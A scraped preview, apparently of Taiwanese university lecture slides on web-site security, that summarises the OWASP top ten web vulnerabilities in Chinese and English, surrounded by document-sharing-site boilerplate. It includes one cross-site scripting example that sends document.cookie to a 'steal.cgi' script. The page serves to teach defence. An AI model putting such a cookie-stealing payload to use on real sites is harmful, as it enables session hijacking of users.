- 1、本文档共47页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
企业网站服务之建置与管理-国立暨南国际大学
OWASP Open Web Application Security Project (OWASP) /index.php/Taiwan 十大Web資安漏洞列表 A1.跨站腳本攻擊 (Cross Site Scripting,簡稱XSS) A2. 注入缺失(Injection Flaw):SQL Injection與Command Injection A3. 惡意檔案執行(Malicious File Execution) A4. 不安全的物件參考(Insecure Direct Object Reference) A5. 跨網站的偽造要求 (Cross-Site Request Forgery,簡稱CSRF) A6. 資訊揭露與不適當錯誤 A7. 遭破壞的鑑別與連線管理 A8. 不安全的密碼儲存器 A9. 不安全的通訊(Insecure Communication) A10. 疏於限制URL存取(Failure to Restrict URL Access) 資料來源: OWASP台灣分會 OWASP: Open Web Application Security Project (2007) The Ten Most Critical Web Application Security Vulnerabilities Unvalidated Parameters Broken Access Control Broken Account and Session Management Cross-Site Scripting (XSS) Buffer Overflows Command Injection Flaws Error Handling Problems Insecure Use of Cryptography Remote Administration Flaws Web and Application Server Misconfiguration (1). Unvalidated Parameters Information from web requests is not validated before being used by a web application. Attackers can use these flaws to attack background components through a web application. (2). Broken Access Control Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access other users accounts, view sensitive files, or use unauthorized functions. /print.asp?id=u1257 (3). Broken Account and Session Management Account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users identities. (4). Cross-Site Scripting (XSS) The web application can be used as a mechanism to transport an attack to an end users browser. A successful attack can disclose the end users session token, attack the local machine, or spoof content to fool the user. XSS Example script window.location=/steal.cgi?ck=+document.cookie; /script ~留言版~ XSS Web Application Hijack Scenario (5). Buffer Overflows Web application components in some
您可能关注的文档
- 产品特稿2011年07月以复古之名百年灵腕表经典复刻引领复古风潮.DOC
- 产品规格与操作.PDF
- 产品规格书-联创光电.PDF
- 产品规格书CABLE KVM IC-52D - 深圳市英技行实业有限公司.PDF
- 交通安全融入健康与体育.PPT
- 产品规格书CABLE KVM IC-62H - 深圳市英技行实业有限公司.PDF
- 产品说明书-易锦生物.PDF
- 产品首页 - Compro.DOC
- 亲子共用APP 辅助儿童音感学习效益之研究1 前言 - GCCCE 2016.PDF
- 亭湖区教育装备现代化多媒体教学系统用户手册-盐城鑫阳科教设备.DOC
- 教科版(2017秋)科学二年级上册2.6 做一顶帽子 教学设计.docx
- 河北高频考点专训四 质量守恒定律的应用教学设计---2024-2025学年九年级化学人教版(2024)上册.docx
- 大单元教学【核心素养目标】6.3 24时计时法教学设计 人教版三年级下册.docx
- 河南省商城县李集中学2023-2024学年下学期九年级历史中考模拟八(讲评教学设计).docx
- 第18章 第25课时 正方形的性质2023-2024学年八年级下册数学课时分层作业教学设计( 人教版).docx
- Module 8 模块测试 教学设计 2024-2025学年英语外研版八年级上册.docx
- 2024-2025学年小学数学五年级下册浙教版教学设计合集.docx
- 2024-2025学年小学劳动四年级下册人民版《劳动》(2022)教学设计合集.docx
- 2024-2025学年小学数学三年级上册冀教版(2024)教学设计合集.docx
- 2024-2025学年高中生物学必修1《分子与细胞》人教版教学设计合集.docx
最近下载
- 航海英语译文.pdf VIP
- 2024-2025学年全国中学生天文知识竞赛备赛试题库(含答案).docx
- 捷信达gshis捷云酒店管理软件v2.0-操作说明书(2019年9月版).pdf VIP
- 生物科技公司绩效管理办法.docx
- 2024-2025学年全国中学生天文知识竞赛考试题库(含答案).docx
- 优化酸洗工艺降低黑斑缺陷培训课件.ppt
- N7K新设备开机标准预配置.doc
- 常见古巴雪茄品牌手册(27个雪茄品牌)(1).pdf
- 2023年天翼云高级解决方案架构师理论考试复习题库-下(多选、判断题).pdf VIP
- 风险管理(中央财经大学)中国大学MOOC(慕课)章节测验试题(答案).pdf
文档评论(0)